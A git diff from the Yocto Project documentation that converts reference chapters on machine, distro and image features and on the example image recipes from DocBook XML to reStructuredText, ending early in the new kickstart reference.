-    </para>
-
-    <para>
-        Features provide a mechanism for working out which packages
-        should be included in the generated images.
-        Distributions can select which features they want to support through the
-        <filename><link linkend='var-DISTRO_FEATURES'>DISTRO_FEATURES</link></filename>
-        variable, which is set or appended to in a distribution's configuration file such as
-        <filename>poky.conf</filename>,
-        <filename>poky-tiny.conf</filename>,
-        <filename>poky-lsb.conf</filename> and so forth.
-        Machine features are set in the
-        <filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link></filename>
-        variable, which is set in the machine configuration file and
-        specifies the hardware features for a given machine.
-    </para>
-
-    <para>
-        These two variables combine to work out which kernel modules,
-        utilities, and other packages to include.
-        A given distribution can support a selected subset of features so some machine features might not
-        be included if the distribution itself does not support them.
-    </para>
-
-    <para>
-        One method you can use to determine which recipes are checking to see if a
-        particular feature is contained or not is to <filename>grep</filename> through
-        the <link linkend='metadata'>Metadata</link>
-        for the feature.
-        Here is an example that discovers the recipes whose build is potentially
-        changed based on a given feature:
-        <literallayout class='monospaced'>
-     $ cd poky
-     $ git grep 'contains.*MACHINE_FEATURES.*<replaceable>feature</replaceable>'
-        </literallayout>
-    </para>
-
-    <section id='ref-features-machine'>
-        <title>Machine Features</title>
-
-        <para>
-            The items below are features you can use with
-            <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>.
-            Features do not have a one-to-one correspondence to packages, and they can
-            go beyond simply controlling the installation of a package or packages.
-            Sometimes a feature can influence how certain recipes are built.
-            For example, a feature might determine whether a particular configure option
-            is specified within the
-            <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-            task for a particular recipe.
-        </para>
-
-        <para>
-            This feature list only represents features as shipped with the Yocto Project metadata:
-            <itemizedlist>
-                <listitem><para><emphasis>acpi:</emphasis> Hardware has ACPI (x86/x86_64 only)
-                    </para></listitem>
-                <listitem><para><emphasis>alsa:</emphasis> Hardware has ALSA audio drivers
-                    </para></listitem>
-                <listitem><para><emphasis>apm:</emphasis> Hardware uses APM (or APM emulation)
-                    </para></listitem>
-                <listitem><para><emphasis>bluetooth:</emphasis> Hardware has integrated BT
-                    </para></listitem>
-                <listitem><para><emphasis>efi:</emphasis> Support for booting through EFI
-                    </para></listitem>
-                <listitem><para><emphasis>ext2:</emphasis> Hardware HDD or Microdrive
-                    </para></listitem>
-                <listitem><para><emphasis>keyboard:</emphasis> Hardware has a keyboard
-                    </para></listitem>
-                <listitem><para><emphasis>pcbios:</emphasis> Support for booting through BIOS
-                    </para></listitem>
-                <listitem><para><emphasis>pci:</emphasis> Hardware has a PCI bus
-                    </para></listitem>
-                <listitem><para><emphasis>pcmcia:</emphasis> Hardware has PCMCIA or CompactFlash sockets
-                    </para></listitem>
-                <listitem><para><emphasis>phone:</emphasis> Mobile phone (voice) support
-                    </para></listitem>
-                <listitem><para><emphasis>qvga:</emphasis> Machine has a QVGA (320x240) display
-                    </para></listitem>
-                <listitem><para><emphasis>rtc:</emphasis> Machine has a Real-Time Clock
-                    </para></listitem>
-                <listitem><para><emphasis>screen:</emphasis> Hardware has a screen
-                    </para></listitem>
-                <listitem><para><emphasis>serial:</emphasis> Hardware has serial support (usually RS232)
-                    </para></listitem>
-                <listitem><para><emphasis>touchscreen:</emphasis> Hardware has a touchscreen
-                    </para></listitem>
-                <listitem><para><emphasis>usbgadget:</emphasis> Hardware is USB gadget device capable
-                    </para></listitem>
-                <listitem><para><emphasis>usbhost:</emphasis> Hardware is USB Host capable
-                    </para></listitem>
-                <listitem><para><emphasis>vfat:</emphasis> FAT file system support
-                    </para></listitem>
-                <listitem><para><emphasis>wifi:</emphasis> Hardware has integrated WiFi
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='ref-features-distro'>
-        <title>Distro Features</title>
-
-        <para>
-            The items below are features you can use with
-            <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-            to enable features across your distribution.
-            Features do not have a one-to-one correspondence to packages,
-            and they can go beyond simply controlling the installation of a
-            package or packages.
-            In most cases, the presence or absence of a feature translates to
-            the appropriate option supplied to the configure script during the
-            <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-            task for the recipes that optionally
-            support the feature.
-        </para>
-
-        <para>
-            Some distro features are also machine features.
-            These select features make sense to be controlled both at
-            the machine and distribution configuration level.
-            See the
-            <link linkend='var-COMBINED_FEATURES'><filename>COMBINED_FEATURES</filename></link>
-            variable for more information.
-        </para>
-
-        <para>
-            This list only represents features as shipped with the Yocto Project metadata:
-            <itemizedlist>
-                <listitem><para><emphasis>alsa:</emphasis> Include ALSA support
-                    (OSS compatibility kernel modules installed if available).
-                    </para></listitem>
-                <listitem><para><emphasis>api-documentation:</emphasis>
-                    Enables generation of API documentation during recipe
-                    builds.
-                    The resulting documentation is added to SDK tarballs
-                    when the
-                    <filename>bitbake -c populate_sdk</filename> command
-                    is used.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#adding-api-documentation-to-the-standard-sdk'>Adding API Documentation to the Standard SDK</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual.
-                    </para></listitem>
-                <listitem><para><emphasis>bluetooth:</emphasis> Include
-                    bluetooth support (integrated BT only).</para></listitem>
-                <listitem><para><emphasis>cramfs:</emphasis> Include CramFS
-                    support.</para></listitem>
-                <listitem><para><emphasis>directfb:</emphasis>
-                    Include DirectFB support.
-                    </para></listitem>
-                <listitem><para><emphasis>ext2:</emphasis> Include tools for
-                    supporting for devices with internal HDD/Microdrive for
-                    storing files (instead of Flash only devices).
-                    </para></listitem>
-                <listitem><para><emphasis>ipsec:</emphasis> Include IPSec
-                    support.</para></listitem>
-                <listitem><para><emphasis>ipv6:</emphasis> Include IPv6 support.
-                    </para></listitem>
-                <listitem><para><emphasis>keyboard:</emphasis> Include keyboard
-                    support (e.g. keymaps will be loaded during boot).
-                    </para></listitem>
-                <listitem><para><emphasis>ldconfig:</emphasis>
-                    Include support for ldconfig and
-                    <filename>ld.so.conf</filename> on the target.
-                    </para></listitem>
-                <listitem><para><emphasis>nfs:</emphasis> Include NFS client
-                    support (for mounting NFS exports on device).
-                    </para></listitem>
-                <listitem><para><emphasis>opengl:</emphasis>
-                    Include the Open Graphics Library, which is a
-                    cross-language, multi-platform application programming
-                    interface used for rendering two and three-dimensional
-                    graphics.</para></listitem>
-                <listitem><para><emphasis>pci:</emphasis> Include PCI bus
-                    support.</para></listitem>
-                <listitem><para><emphasis>pcmcia:</emphasis> Include
-                    PCMCIA/CompactFlash support.</para></listitem>
-                <listitem><para><emphasis>ppp:</emphasis> Include PPP dialup
-                    support.</para></listitem>
-                <listitem><para><emphasis>ptest:</emphasis> Enables building
-                    the package tests where supported by individual recipes.
-                    For more information on package tests, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages With ptest</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-                <listitem><para><emphasis>smbfs:</emphasis> Include SMB networks
-                    client support (for mounting Samba/Microsoft Windows shares
-                    on device).</para></listitem>
-                <listitem><para><emphasis>systemd:</emphasis> Include support
-                    for this <filename>init</filename> manager, which is a full
-                    replacement of for <filename>init</filename> with parallel
-                    starting of services, reduced shell overhead, and other
-                    features.
-                    This <filename>init</filename> manager is used by many
-                    distributions.</para></listitem>
-                <listitem><para><emphasis>usbgadget:</emphasis> Include USB
-                    Gadget Device support (for USB networking/serial/storage).
-                    </para></listitem>
-                <listitem><para><emphasis>usbhost:</emphasis> Include USB Host
-                    support (allows to connect external keyboard, mouse,
-                    storage, network etc).</para></listitem>
-                <listitem><para><emphasis>usrmerge:</emphasis> Merges the 
-                    <filename>/bin</filename>, <filename>/sbin</filename>, 
-                    <filename>/lib</filename>, and <filename>/lib64</filename>       
-                    directories into their respective counterparts in the 
-                    <filename>/usr</filename> directory to provide better package 
-                   and application compatibility.</para></listitem>
-                <listitem><para><emphasis>wayland:</emphasis> Include the
-                    Wayland display server protocol and the library that
-                    supports it.</para></listitem>
-                <listitem><para><emphasis>wifi:</emphasis> Include WiFi support
-                    (integrated only).</para></listitem>
-                <listitem><para><emphasis>x11:</emphasis> Include the X server
-                    and libraries.</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='ref-features-image'>
-        <title>Image Features</title>
-
-        <para>
-            The contents of images generated by the OpenEmbedded build system
-            can be controlled by the
-            <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-            and
-            <link linkend='var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></link>
-            variables that you typically configure in your image recipes.
-            Through these variables, you can add several different
-            predefined packages such as development utilities or packages with
-            debug information needed to investigate application problems or
-            profile applications.
-        </para>
-
-        <para>
-            The following image features are available for all images:
-            <itemizedlist>
-                <listitem><para><emphasis>allow-empty-password:</emphasis>
-                    Allows Dropbear and OpenSSH to accept root logins
-                    and logins from accounts having an empty password string.
-                    </para></listitem>
-                <listitem><para><emphasis>dbg-pkgs:</emphasis>
-                    Installs debug symbol packages for all packages installed
-                    in a given image.
-                    </para></listitem>
-                <listitem><para><emphasis>debug-tweaks:</emphasis>
-                    Makes an image suitable for development (e.g.
-                    allows root logins without passwords and enables
-                    post-installation logging).
-                    See the 'allow-empty-password', 'empty-root-password',
-                    and 'post-install-logging' features in this list for
-                    additional information.
-                    </para></listitem>
-                <listitem><para><emphasis>dev-pkgs:</emphasis>
-                    Installs development packages (headers and extra library
-                    links) for all packages installed in a given image.
-                    </para></listitem>
-                <listitem><para><emphasis>doc-pkgs:</emphasis> Installs
-                    documentation packages for all packages installed in a
-                    given image.
-                    </para></listitem>
-                <listitem><para><emphasis>empty-root-password:</emphasis>
-                    Sets the root password to an empty string, which allows
-                    logins with a blank password.
-                    </para></listitem>
-                <listitem><para><emphasis>package-management:</emphasis>
-                    Installs package management tools and preserves the package
-                    manager database.
-                    </para></listitem>
-                <listitem><para><emphasis>post-install-logging:</emphasis>
-                    Enables logging postinstall script runs to
-                    the <filename>/var/log/postinstall.log</filename> file
-                    on first boot of the image on the target system.
-                    <note>
-                        To make the <filename>/var/log</filename> directory
-                        on the target persistent, use the
-                        <link linkend='var-VOLATILE_LOG_DIR'><filename>VOLATILE_LOG_DIR</filename></link>
-                        variable by setting it to "no".
-                    </note>
-                    </para></listitem>
-                <listitem><para><emphasis>ptest-pkgs:</emphasis>
-                    Installs ptest packages for all ptest-enabled recipes.
-                    </para></listitem>
-                <listitem><para><emphasis>read-only-rootfs:</emphasis>
-                    Creates an image whose root filesystem is read-only.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-read-only-root-filesystem'>Creating a Read-Only Root Filesystem</ulink>"
-                    section in the Yocto Project Development Tasks Manual for
-                    more information.
-                    </para></listitem>
-                <listitem><para><emphasis>splash:</emphasis>
-                    Enables showing a splash screen during boot.
-                    By default, this screen is provided by
-                    <filename>psplash</filename>, which does allow
-                    customization.
-                    If you prefer to use an alternative splash screen package,
-                    you can do so by setting the <filename>SPLASH</filename>
-                    variable to a different package name (or names) within the
-                    image recipe or at the distro configuration level.
-                    </para></listitem>
-                <listitem><para><emphasis>staticdev-pkgs:</emphasis>
-                    Installs static development packages, which are
-                    static libraries (i.e. <filename>*.a</filename> files), for
-                    all packages installed in a given image.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Some image features are available only when you inherit the
-            <link linkend='ref-classes-core-image'><filename>core-image</filename></link>
-            class.
-            The current list of these valid features is as follows:
-            <itemizedlist>
-                <listitem><para><emphasis>hwcodecs:</emphasis> Installs
-                    hardware acceleration codecs.
-                    </para></listitem>
-                <listitem><para><emphasis>nfs-server:</emphasis>
-                    Installs an NFS server.
-                    </para></listitem>
-                <listitem><para><emphasis>perf:</emphasis>
-                    Installs profiling tools such as
-                    <filename>perf</filename>, <filename>systemtap</filename>,
-                    and <filename>LTTng</filename>.
-                    For general information on user-space tools, see the
-                    <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                    manual.
-                    </para></listitem>
-                <listitem><para><emphasis>ssh-server-dropbear:</emphasis>
-                    Installs the Dropbear minimal SSH server.
-                    </para></listitem>
-                <listitem><para><emphasis>ssh-server-openssh:</emphasis>
-                    Installs the OpenSSH SSH server, which is more
-                    full-featured than Dropbear.
-                    Note that if both the OpenSSH SSH server and the Dropbear
-                    minimal SSH server are present in
-                    <filename>IMAGE_FEATURES</filename>, then OpenSSH will take
-                    precedence and Dropbear will not be installed.
-                    </para></listitem>
-                <listitem><para><emphasis>tools-debug:</emphasis>
-                    Installs debugging tools such as
-                    <filename>strace</filename> and <filename>gdb</filename>.
-                    For information on GDB, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-gdb-remotedebug'>Debugging With the GNU Project Debugger (GDB) Remotely</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    For information on tracing and profiling, see the
-                    <ulink url='&YOCTO_DOCS_PROF_URL;'>Yocto Project Profiling and Tracing Manual</ulink>.
-                    </para></listitem>
-                <listitem><para><emphasis>tools-sdk:</emphasis>
-                    Installs a full SDK that runs on the device.
-                    </para></listitem>
-                <listitem><para><emphasis>tools-testapps:</emphasis>
-                    Installs device testing tools (e.g. touchscreen debugging).
-                    </para></listitem>
-                <listitem><para><emphasis>x11:</emphasis>
-                    Installs the X server.
-                    </para></listitem>
-                <listitem><para><emphasis>x11-base:</emphasis>
-                    Installs the X server with a minimal environment.
-                    </para></listitem>
-                <listitem><para><emphasis>x11-sato:</emphasis>
-                    Installs the OpenedHand Sato environment.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-    </section>
-
-    <section id='ref-features-backfill'>
-        <title>Feature Backfilling</title>
-
-        <para>
-            Sometimes it is necessary in the OpenEmbedded build system to extend
-            <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>
-            or <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-            to control functionality that was previously enabled and not able
-            to be disabled.
-            For these cases, we need to add an
-            additional feature item to appear in one of these variables,
-            but we do not want to force developers who have existing values
-            of the variables in their configuration to add the new feature
-            in order to retain the same overall level of functionality.
-            Thus, the OpenEmbedded build system has a mechanism to
-            automatically "backfill" these added features into existing
-            distro or machine configurations.
-            You can see the list of features for which this is done by
-            finding the
-            <link linkend='var-DISTRO_FEATURES_BACKFILL'><filename>DISTRO_FEATURES_BACKFILL</filename></link>
-            and <link linkend='var-MACHINE_FEATURES_BACKFILL'><filename>MACHINE_FEATURES_BACKFILL</filename></link>
-            variables in the <filename>meta/conf/bitbake.conf</filename> file.
-        </para>
-
-        <para>
-            Because such features are backfilled by default into all
-            configurations as described in the previous paragraph, developers
-            who wish to disable the new features need to be able to selectively
-            prevent the backfilling from occurring.
-            They can do this by adding the undesired feature or features to the
-            <link linkend='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></link>
-            or <link linkend='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></link>
-            variables for distro features and machine features respectively.
-        </para>
-
-        <para>
-            Here are two examples to help illustrate feature backfilling:
-            <itemizedlist>
-                <listitem><para><emphasis>The "pulseaudio" distro feature option</emphasis>:
-                    Previously, PulseAudio support was enabled within the Qt and
-                    GStreamer frameworks.
-                    Because of this, the feature is backfilled and thus
-                    enabled for all distros through the
-                    <filename>DISTRO_FEATURES_BACKFILL</filename>
-                    variable in the <filename>meta/conf/bitbake.conf</filename> file.
-                    However, your distro needs to disable the feature.
-                    You can disable the feature without affecting
-                    other existing distro configurations that need PulseAudio support
-                    by adding "pulseaudio" to
-                    <filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename>
-                    in your distro's <filename>.conf</filename> file.
-                    Adding the feature to this variable when it also
-                    exists in the <filename>DISTRO_FEATURES_BACKFILL</filename>
-                    variable prevents the build system from adding the feature to
-                    your configuration's <filename>DISTRO_FEATURES</filename>, effectively disabling
-                    the feature for that particular distro.</para></listitem>
-                <listitem><para><emphasis>The "rtc" machine feature option</emphasis>:
-                    Previously, real time clock (RTC) support was enabled for all
-                    target devices.
-                    Because of this, the feature is backfilled and thus enabled
-                    for all machines through the <filename>MACHINE_FEATURES_BACKFILL</filename>
-                    variable in the <filename>meta/conf/bitbake.conf</filename> file.
-                    However, your target device does not have this capability.
-                    You can disable RTC support for your device without
-                    affecting other machines that need RTC support
-                    by adding the feature to your machine's
-                    <filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename>
-                    list in the machine's <filename>.conf</filename> file.
-                    Adding the feature to this variable when it also
-                    exists in the <filename>MACHINE_FEATURES_BACKFILL</filename>
-                    variable prevents the build system from adding the feature to
-                    your configuration's <filename>MACHINE_FEATURES</filename>, effectively
-                    disabling RTC support for that particular machine.</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</chapter>
-
-<!--
-vim: expandtab tw=80 ts=4 spell spelllang=en_gb
--->
diff --git a/documentation/ref-manual/ref-images.rst b/documentation/ref-manual/ref-images.rst
new file mode 100644
index 0000000000..70feadf1ff
--- /dev/null
+++ b/documentation/ref-manual/ref-images.rst
@@ -0,0 +1,139 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******
+Images
+******
+
+The OpenEmbedded build system provides several example images to satisfy
+different needs. When you issue the ``bitbake`` command you provide a
+"top-level" recipe that essentially begins the build for the type of
+image you want.
+
+.. note::
+
+   Building an image without GNU General Public License Version 3
+   (GPLv3), GNU Lesser General Public License Version 3 (LGPLv3), and
+   the GNU Affero General Public License Version 3 (AGPL-3.0) components
+   is only tested for core-image-minimal image. Furthermore, if you would like to
+   build an image and verify that it does not include GPLv3 and similarly licensed
+   components, you must make the following changes in the image recipe
+   file before using the BitBake command to build the image:
+
+       INCOMPATIBLE_LICENSE = "GPL-3.0* LGPL-3.0*"
+
+   Alternatively, you can adjust ``local.conf`` file, repeating and adjusting the line
+   for all images where the license restriction must apply:
+
+       INCOMPATIBLE_LICENSE_pn-your-image-name = "GPL-3.0* LGPL-3.0*"
+
+From within the ``poky`` Git repository, you can use the following
+command to display the list of directories within the :term:`Source Directory`
+that contain image recipe files: ::
+
+   $ ls meta*/recipes*/images/*.bb
+
+Following is a list of supported recipes:
+
+-  ``build-appliance-image``: An example virtual machine that contains
+   all the pieces required to run builds using the build system as well
+   as the build system itself. You can boot and run the image using
+   either the `VMware
+   Player <http://www.vmware.com/products/player/overview.html>`__ or
+   `VMware
+   Workstation <http://www.vmware.com/products/workstation/overview.html>`__.
+   For more information on this image, see the :yocto_home:`Build
+   Appliance </software-item/build-appliance>` page
+   on the Yocto Project website.
+
+-  ``core-image-base``: A console-only image that fully supports the
+   target device hardware.
+
+-  ``core-image-clutter``: An image with support for the Open GL-based
+   toolkit Clutter, which enables development of rich and animated
+   graphical user interfaces.
+
+-  ``core-image-full-cmdline``: A console-only image with more
+   full-featured Linux system functionality installed.
+
+-  ``core-image-lsb``: An image that conforms to the Linux Standard Base
+   (LSB) specification. This image requires a distribution configuration
+   that enables LSB compliance (e.g. ``poky-lsb``). If you build
+   ``core-image-lsb`` without that configuration, the image will not be
+   LSB-compliant.
+
+-  ``core-image-lsb-dev``: A ``core-image-lsb`` image that is suitable
+   for development work using the host. The image includes headers and
+   libraries you can use in a host development environment. This image
+   requires a distribution configuration that enables LSB compliance
+   (e.g. ``poky-lsb``). If you build ``core-image-lsb-dev`` without that
+   configuration, the image will not be LSB-compliant.
+
+-  ``core-image-lsb-sdk``: A ``core-image-lsb`` that includes everything
+   in the cross-toolchain but also includes development headers and
+   libraries to form a complete standalone SDK. This image requires a
+   distribution configuration that enables LSB compliance (e.g.
+   ``poky-lsb``). If you build ``core-image-lsb-sdk`` without that
+   configuration, the image will not be LSB-compliant. This image is
+   suitable for development using the target.
+
+-  ``core-image-minimal``: A small image just capable of allowing a
+   device to boot.
+
+-  ``core-image-minimal-dev``: A ``core-image-minimal`` image suitable
+   for development work using the host. The image includes headers and
+   libraries you can use in a host development environment.
+
+-  ``core-image-minimal-initramfs``: A ``core-image-minimal`` image that
+   has the Minimal RAM-based Initial Root Filesystem (initramfs) as part
+   of the kernel, which allows the system to find the first "init"
+   program more efficiently. See the
+   :term:`PACKAGE_INSTALL` variable for
+   additional information helpful when working with initramfs images.
+
+-  ``core-image-minimal-mtdutils``: A ``core-image-minimal`` image that
+   has support for the Minimal MTD Utilities, which let the user
+   interact with the MTD subsystem in the kernel to perform operations
+   on flash devices.
+
+-  ``core-image-rt``: A ``core-image-minimal`` image plus a real-time
+   test suite and tools appropriate for real-time use.
+
+-  ``core-image-rt-sdk``: A ``core-image-rt`` image that includes
+   everything in the cross-toolchain. The image also includes
+   development headers and libraries to form a complete stand-alone SDK
+   and is suitable for development using the target.
+
+-  ``core-image-sato``: An image with Sato support, a mobile environment
+   and visual style that works well with mobile devices. The image
+   supports X11 with a Sato theme and applications such as a terminal,
+   editor, file manager, media player, and so forth.
+
+-  ``core-image-sato-dev``: A ``core-image-sato`` image suitable for
+   development using the host. The image includes libraries needed to
+   build applications on the device itself, testing and profiling tools,
+   and debug symbols. This image was formerly ``core-image-sdk``.
+
+-  ``core-image-sato-sdk``: A ``core-image-sato`` image that includes
+   everything in the cross-toolchain. The image also includes
+   development headers and libraries to form a complete standalone SDK
+   and is suitable for development using the target.
+
+-  ``core-image-testmaster``: A "master" image designed to be used for
+   automated runtime testing. Provides a "known good" image that is
+   deployed to a separate partition so that you can boot into it and use
+   it to deploy a second image to be tested. You can find more
+   information about runtime testing in the
+   ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  ``core-image-testmaster-initramfs``: A RAM-based Initial Root
+   Filesystem (initramfs) image tailored for use with the
+   ``core-image-testmaster`` image.
+
+-  ``core-image-weston``: A very basic Wayland image with a terminal.
+   This image provides the Wayland protocol libraries and the reference
+   Weston compositor. For more information, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:using wayland and weston`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  ``core-image-x11``: A very basic X11 image with a terminal.
diff --git a/documentation/ref-manual/ref-images.xml b/documentation/ref-manual/ref-images.xml
deleted file mode 100644
index 1f96186c6e..0000000000
--- a/documentation/ref-manual/ref-images.xml
+++ /dev/null
@@ -1,169 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-images'>
-    <title>Images</title>
-
-    <para>
-        The OpenEmbedded build system provides several example
-        images to satisfy different needs.
-        When you issue the <filename>bitbake</filename> command you provide a “top-level� recipe
-        that essentially begins the build for the type of image you want.
-    </para>
-
-    <note>
-        Building an image without GNU General Public License Version 3 (GPLv3),
-        GNU Lesser General Public License Version 3 (LGPLv3), and the
-        GNU Affero General Public License Version 3 (AGPL-3.0) components
-        is only supported for minimal and base images.
-        Furthermore, if you are going to build an image using non-GPLv3 and
-        similarly licensed components, you must make the following changes in
-        the <filename>local.conf</filename> file before using the BitBake
-        command to build the minimal or base image:
-        <literallayout class='monospaced'>
-     1. Comment out the EXTRA_IMAGE_FEATURES line
-     2. Set INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
-        </literallayout>
-    </note>
-
-    <para>
-        From within the <filename>poky</filename> Git repository, you can use
-        the following command to display the list of directories within the
-        <link linkend='source-directory'>Source Directory</link>
-        that contain image recipe files:
-        <literallayout class='monospaced'>
-     $ ls meta*/recipes*/images/*.bb
-        </literallayout>
-    </para>
-
-    <para>
-        Following is a list of supported recipes:
-        <itemizedlist>
-            <listitem><para>
-                <filename>build-appliance-image</filename>:
-                An example virtual machine that contains all the pieces
-                required to run builds using the build system as well as the
-                build system itself.
-                You can boot and run the image using either the
-                <ulink url='http://www.vmware.com/products/player/overview.html'>VMware Player</ulink>
-                or
-                <ulink url='http://www.vmware.com/products/workstation/overview.html'>VMware Workstation</ulink>.
-                For more information on this image, see the
-                <ulink url='&YOCTO_HOME_URL;/software-item/build-appliance/'>Build Appliance</ulink>
-                page on the Yocto Project website.
-                </para></listitem>
-            <listitem><para><filename>core-image-base</filename>:
-                A console-only image that fully supports the target device hardware.</para></listitem>
-            <listitem><para><filename>core-image-clutter</filename>:
-                An image with support for the Open GL-based toolkit Clutter, which enables development of
-                rich and animated graphical user interfaces.</para></listitem>
-            <listitem><para><filename>core-image-full-cmdline</filename>:
-                A console-only image with more full-featured Linux system
-                functionality installed.</para></listitem>
-                <listitem><para><filename>core-image-lsb</filename>:
-                An image that conforms to the Linux Standard Base (LSB)
-                specification.
-                This image requires a distribution configuration that
-                enables LSB compliance (e.g. <filename>poky-lsb</filename>).
-                If you build <filename>core-image-lsb</filename> without that
-                configuration, the image will not be LSB-compliant.
-                </para></listitem>
-            <listitem><para><filename>core-image-lsb-dev</filename>:
-                A <filename>core-image-lsb</filename> image that is suitable for development work
-                using the host.
-                The image includes headers and libraries you can use in a host development
-                environment.
-                This image requires a distribution configuration that
-                enables LSB compliance (e.g. <filename>poky-lsb</filename>).
-                If you build <filename>core-image-lsb-dev</filename> without that
-                configuration, the image will not be LSB-compliant.
-                </para></listitem>
-            <listitem><para><filename>core-image-lsb-sdk</filename>:
-                A <filename>core-image-lsb</filename> that includes everything in
-                the cross-toolchain but also includes development headers and libraries
-                to form a complete standalone SDK.
-                This image requires a distribution configuration that
-                enables LSB compliance (e.g. <filename>poky-lsb</filename>).
-                If you build <filename>core-image-lsb-sdk</filename> without that
-                configuration, the image will not be LSB-compliant.
-                This image is suitable for development using the target.</para></listitem>
-            <listitem><para><filename>core-image-minimal</filename>:
-                A small image just capable of allowing a device to boot.</para></listitem>
-            <listitem><para><filename>core-image-minimal-dev</filename>:
-                A <filename>core-image-minimal</filename> image suitable for development work
-                using the host.
-                The image includes headers and libraries you can use in a host development
-                environment.
-                </para></listitem>
-            <listitem><para id='images-core-image-minimal-initramfs'><filename>core-image-minimal-initramfs</filename>:
-                A <filename>core-image-minimal</filename> image that has the Minimal RAM-based
-                Initial Root Filesystem (initramfs) as part of the kernel,
-                which allows the system to find the first “init� program more efficiently.
-                See the
-                <link linkend='var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></link>
-                variable for additional information helpful when working with
-                initramfs images.
-                </para></listitem>
-            <listitem><para><filename>core-image-minimal-mtdutils</filename>:
-                A <filename>core-image-minimal</filename> image that has support
-                for the Minimal MTD Utilities, which let the user interact with the
-                MTD subsystem in the kernel to perform operations on flash devices.
-                </para></listitem>
-            <listitem><para><filename>core-image-rt</filename>:
-                A <filename>core-image-minimal</filename> image plus a real-time test suite and
-                tools appropriate for real-time use.</para></listitem>
-            <listitem><para><filename>core-image-rt-sdk</filename>:
-                A <filename>core-image-rt</filename> image that includes everything in
-                the cross-toolchain.
-                The image also includes development headers and libraries to form a complete
-                stand-alone SDK and is suitable for development using the target.
-                </para></listitem>
-            <listitem><para><filename>core-image-sato</filename>:
-                An image with Sato support, a mobile environment and visual style that works well
-                with mobile devices.
-                The image supports X11 with a Sato theme and applications such as
-                a terminal, editor, file manager, media player, and so forth.
-                </para></listitem>
-            <listitem><para><filename>core-image-sato-dev</filename>:
-                A <filename>core-image-sato</filename> image suitable for development
-                using the host.
-                The image includes libraries needed to build applications on the device itself,
-                testing and profiling tools, and debug symbols.
-                This image was formerly <filename>core-image-sdk</filename>.
-                </para></listitem>
-            <listitem><para><filename>core-image-sato-sdk</filename>:
-                A <filename>core-image-sato</filename> image that includes everything in
-                the cross-toolchain.
-                The image also includes development headers and libraries to form a complete standalone SDK
-                and is suitable for development using the target.</para></listitem>
-            <listitem><para><filename>core-image-testmaster</filename>:
-                A "master" image designed to be used for automated runtime testing.
-                Provides a "known good" image that is deployed to a separate
-                partition so that you can boot into it and use it to deploy a
-                second image to be tested.
-                You can find more information about runtime testing in the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para><filename>core-image-testmaster-initramfs</filename>:
-                A RAM-based Initial Root Filesystem (initramfs) image tailored for
-                use with the <filename>core-image-testmaster</filename> image.
-                </para></listitem>
-            <listitem><para><filename>core-image-weston</filename>:
-                A very basic Wayland image with a terminal.
-                This image provides the Wayland protocol libraries and the
-                reference Weston compositor.
-                For more information, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-using-wayland-and-weston'>Using Wayland and Weston</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para><filename>core-image-x11</filename>:
-                A very basic X11 image with a terminal.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-kickstart.rst b/documentation/ref-manual/ref-kickstart.rst
new file mode 100644
index 0000000000..7f6d4ebe1c
--- /dev/null
+++ b/documentation/ref-manual/ref-kickstart.rst
@@ -0,0 +1,216 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************************************
+OpenEmbedded Kickstart (``.wks``) Reference
+*******************************************
+
+.. _openembedded-kickstart-wks-reference:
+
+Introduction
+============
+
+The current Wic implementation supports only the basic kickstart
+partitioning commands: ``partition`` (or ``part`` for short) and
+``bootloader``.
+
+.. note::
+
